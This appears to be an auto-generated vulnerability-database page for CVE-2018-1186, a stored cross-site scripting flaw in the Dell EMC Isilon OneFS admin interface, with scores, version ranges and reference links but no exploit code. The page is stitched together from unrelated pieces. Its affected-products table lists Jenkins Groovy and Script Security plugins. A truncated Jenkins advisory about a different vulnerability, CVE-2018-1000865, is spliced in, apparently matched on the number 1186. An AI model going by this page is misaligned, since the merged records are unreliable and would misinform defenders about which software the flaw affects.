CVE-2018-1186
published 2018-03-26CVE-2018-1186: Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 is affected by a…
PriorityP424medium4.8CVSS 3.0
AVNACLPRHUIRSCCLILAN
EXPLOIT
EPSS
1.86%
76.6th percentile
Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 is affected by a cross-site scripting vulnerability in the Cluster description of the OneFS web administration interface. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dell | emc_isilon | — | — |
| dell | emc_isilon | 7.2.1.0 – 7.2.1.6 | — |
| dell | emc_isilon | 8.0.0.0 – 8.0.0.6 | — |
| dell | emc_isilon | 8.0.1.0 – 8.0.1.2 | — |
| dell | emc_isilon | 8.1.0.0 – 8.1.0.1 | — |
| dell_emc | isilon_onefs | — | — |
| jenkins | groovy_plugin | — | — |
| jenkins | groovy_sandbox_library_used_by_script_security_plugin | — | — |
| jenkins | pipeline_groovy_plugin | — | — |
| jenkins | script_security_plugin | — | — |
CVSS provenance
nvdv3.04.8MEDIUMCVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2gw8-rmq5-c5gv: Dell EMC Isilon versions between 8
ghsa_unreviewed·2022-05-14
CVE-2018-1186 [MEDIUM] CWE-79 GHSA-2gw8-rmq5-c5gv: Dell EMC Isilon versions between 8
Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 is affected by a cross-site scripting vulnerability in the Cluster description of the OneFS web administration interface. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website.
Jenkins
Jenkins Security Advisory 2018-10-29
vendor_jenkins·2018-10-29·CVSS 8.8
CVE-2018-1000865 [HIGH] Jenkins Security Advisory 2018-10-29
Title: Jenkins Security Advisory 2018-10-29
Jenkins Security Advisory 2018-10-29
Jenkins Security Home
For Administrators
Overview
Terminology
Vulnerabilities and Scoring
Security Advisories
Security Issues
Advisory Schedule
Vulnerabilities in Plugins
How We Fix Security Issues
For Reporters
Reporting Vulnerabilities
Jenkins CNA
For Maintainers
Overview
Vulnerabilities in Plugins
Jenkins Security Team
About
Contributions
This advisory announces vulnerabilities in the following Jenkins deliverables:
Pipeline: Groovy
Plugin
Script Security
Plugin
Descriptions
Sandbox Bypass in Script Security and Pipeline Groovy Plugins
SECURITY-1186
/
CVE-2018-1000865 (Script Security Plugin) an
No detection rules found.
No writeups or analysis indexed.
http://seclists.org/fulldisclosure/2018/Mar/50http://www.securityfocus.com/bid/103033https://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilitieshttps://www.exploit-db.com/exploits/44039/http://seclists.org/fulldisclosure/2018/Mar/50http://www.securityfocus.com/bid/103033https://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilitieshttps://www.exploit-db.com/exploits/44039/
2018-03-26
Published